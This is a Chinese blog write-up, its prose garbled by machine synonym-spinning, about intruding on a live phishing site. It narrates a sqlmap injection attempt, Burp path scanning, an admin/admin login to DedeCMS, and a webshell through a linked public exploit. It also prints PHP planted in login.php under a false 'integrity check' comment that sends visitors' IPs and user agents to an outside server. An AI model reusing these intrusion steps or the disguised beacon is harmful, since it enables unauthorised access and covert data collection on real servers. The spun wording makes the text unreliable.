由小小姐夸耀引起的一次垂纶网站入侵并溯源

本文所写的内容根基真实，但有些渗出溯源的进程为了描写的精简被修改删除。一些无关紧急的工作也被略去，但对渗出至关重要的大思绪和小细节我都没放过。同时在渗出的时辰我没有留下截图，许多图是我其后补上的。

1. 引子

工作要从一周前提及。

深夜，睡房，我照例空虚寥寂百无聊赖地刷群。

溘然看到 D小姐姐 在群内里说她用了 N 线程给垂纶网站交了大量垃圾信息，最后卡爆了处事器，颇为自得。

当晚我正好闲着没事，就抉择小小地冒犯一下这个垂纶网站，故事就这样开始了

2. 入侵

起首是基本的信息汇集，可是当我查询 whois 和微步在线之后却没有任何功效，表现的是这些注册信息被掩护了，毫无功效。最后只知道统一台处事器上运行 了许多沟通的垂纶站。

亏得 D小姐姐 的垃圾数据并没有给处事器造成太大影响，很快处事器就规复了并表现如下界面

此刻的垂纶网站的建造者都很本心，界面弄得跟官方的很是相似，可不像昔时那些任意画个框框就等着要暗码的，事实期间在前进嘛。但这也不是美满的，暗码哪里弄成小写 qq 的了。

翻看垂纶网址 ：http://timea.icu/Ru_op/newwap.html

的源码，我们可以看到作者用了 document.write(unescape(' 来掩盖网页源码，应该是用来防备被基于要害字拦截的防诈骗软件拦截?

并且网页内里还引用了个风趣的 JS

window.onload=function() { 
    var date_time='2019-4-2 18:00:59'; 
    
   var time=Date.parse(newDate()); 
   var date1=Date.parse(newDate(date_time.replace(/-/g, '/'))); 
   if(date1<time) { 
       top.location.href='/expire.html'; 
  }; 
  $('#expire-time').html(date_time); 
}; 

或许就是一段时刻后这个网站就 "expire" 掉了，而 expire.html 长这个样子。

这应该声名这个网站不是垂纶者本身做的而是费钱买来的。此刻不愧是社会主义市场经济啊，这些搞黑产的已经弄成一个财富链了，有的人认真做网站有的人认真骗，分工明晰各司其职高效事变呢。

接着在搜查没有 WAF 后就在登录处拦截 POST 包，扔到 sqlmap 内里注入

果然毫有时外地失败了。这年初，连垂纶站都这么安详了。

我再用 Burp 扫了下路径，发明白几个风趣的路径。

这是我方才补的图，原来这些路径内里尚有 phpmyadmin 的可是在其后打点员换了路径以是此刻没了。我先实行了 phpmyadmin 的弱暗码，可是失败了，转去看此外路径

最风趣的是在 /membe r路径中

没想到这一个简简朴单的垂纶站必要用到一个 DedeCMS ?

我就顺部下了个 DedeCMS 的源码看看，发明靠山路径 /dede，点进去居然有，并且直接用 admin/admin 就登录了!

靠山别有洞天，皮肤比 Dede 官方的不知道悦目到那边去。假如 Dede 官方有人看到这个内心必然会很忸怩吧。靠山还可以看到各类垂纶数据，因为暂且它的靠山出了些短处我就不截图了。

不外不管这么嗣魅这只是套了层皮罢了，内核照旧 DedeCMS，我就在 SecWIKI 的 CMS Hunter 搜了个 DedeCMS 靠山提权裂痕 《DedeCMS V5.7 SP2靠山存在代码执行裂痕》：

https://github.com/SecWiki/CMS-Hunter/tree/master/DedeCMS/DedeCMS%20V5.7%20SP2%E5%90%8E%E5%8F%B0%E5%AD%98%E5%9C%A8%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E

,就乐成 getshell 了

2. 第一次不三不四溯源

是时辰把垂纶者的IP弄出来了!

想想垂纶者会怎么会见?虽然是会见靠山了!于是我在靠山的 login.php 加上了如下代码来记录 IP

//检测安装目次完备性 
function Check($url) 
{ 
      $ch=curl_init(); 
      curl_setopt( $ch, CURLOPT_URL, $url); 
      curl_setopt( $ch, CURLOPT_RETURNTRANSFER, 1); 
      curl_setopt( $ch, CURLOPT_CUSTOMREQUEST, 'GET'); 
      curl_setopt( $ch, CURLOPT_TIMEOUT, 60); 
      $result=curl_exec( $ch); 
      curl_close( $ch); 
      return $result; 
} 
$url="http://...:/message.php?info=Another%20"; 
$info=urlencode((string)$_SERVER['REMOTE_ADDR'].(string)$_SERVER['HTTP_USER_AGENT']); 
Check($url.$info); 

个中这个吸取的处事器是拿S神的处事器干的，他为了检测菜刀流量的举动专门搭建了个处事器供我们去日。

这样我在处事器上面会见/就可以看到 IP 了

痛惜好像我兴奋得太早，一全国去发明登过这个靠山的人遍布世界各地，预计是世界各地都有公理黑客想要干这个网站吧，但这样进攻者的 IP 就被藏起来了

看来我必要提权，进入处事器，拿到更多对象!

3. 提权

在提权之前我还干了个工作，就是生涯整站源码以查找要害信息省得一会万一新闻太大可能搞崩处事器导致轰动打点员权限丢失我好歹能留点眷念品。

进入 webshell 发明呼吁执行的函数都被榨取了，起主要办理呼吁执行的题目。很多人以为呼吁执行函数被榨取就安枕无忧 了，但接下来的工作证明这是错的。

（编辑：河北网）

【声明】本站内容均来自网络，其相关言论仅代表作者个人观点，不代表本站立场。若无意侵犯到您的权利，请及时与联系站长删除相关内容!